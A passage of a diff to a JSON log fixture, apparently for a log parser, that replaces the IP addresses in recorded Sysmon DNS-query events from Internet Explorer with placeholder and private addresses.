tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", @@ -7425,7 +7425,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067467200Z'/\u003e\u003cEventRecordID\u003e202\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.048\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecdnjs.cloudflare.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "channel": "Microsoft-Windows-Sysmon/Operational", @@ -7437,7 +7437,7 @@ "ProcessId": "2736", "QueryName": "cdnjs.cloudflare.com", "QueryStatus": "0", - "QueryResults": "::ffff:104.19.195.151;::ffff:104.19.199.151;::ffff:104.19.198.151;::ffff:104.19.197.151;::ffff:104.19.196.151;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "version": 5, @@ -7464,7 +7464,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067488100Z'/\u003e\u003cEventRecordID\u003e203\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.051\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.onaudience.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7479,7 +7479,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:85.194.243.23;::ffff:85.194.243.239;::ffff:85.194.240.137;::ffff:85.194.242.103;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.051", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7520,7 +7520,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.054", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7536,7 +7536,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067504600Z'/\u003e\u003cEventRecordID\u003e204\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.054\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.geotrust.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7570,7 +7570,7 @@ "ProcessId": "2736", "QueryName": "ocsp.trust-provider.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" } }, @@ -7578,7 +7578,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067529300Z'/\u003e\u003cEventRecordID\u003e205\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.126\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.trust-provider.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7593,7 +7593,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067550800Z'/\u003e\u003cEventRecordID\u003e206\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca4.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "time_created": "2019-07-18T03:34:10.067Z", @@ -7602,7 +7602,7 @@ "ProcessId": "2736", "QueryName": "ocsp.comodoca4.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.184" }, @@ -7651,7 +7651,7 @@ "ProcessId": "2736", "QueryName": "sync.crwdcntrl.net", "QueryStatus": "0", - "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;", + "QueryResults": "type: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:09.322" }, @@ -7669,7 +7669,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:52.4.111.14;::ffff:52.205.68.184;::ffff:52.0.28.154;::ffff:34.225.82.232;::ffff:18.213.13.245;::ffff:52.22.171.66;::ffff:52.207.199.229;::ffff:52.72.57.144;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067594200Z'/\u003e\u003cEventRecordID\u003e207\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.322\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.crwdcntrl.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 td.crwdcntrl.net;type: 5 nginx-bcp-stackB-428666447.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7681,7 +7681,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:10.067634800Z'/\u003e\u003cEventRecordID\u003e208\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.730\u003c/Data\u003e\u003cData 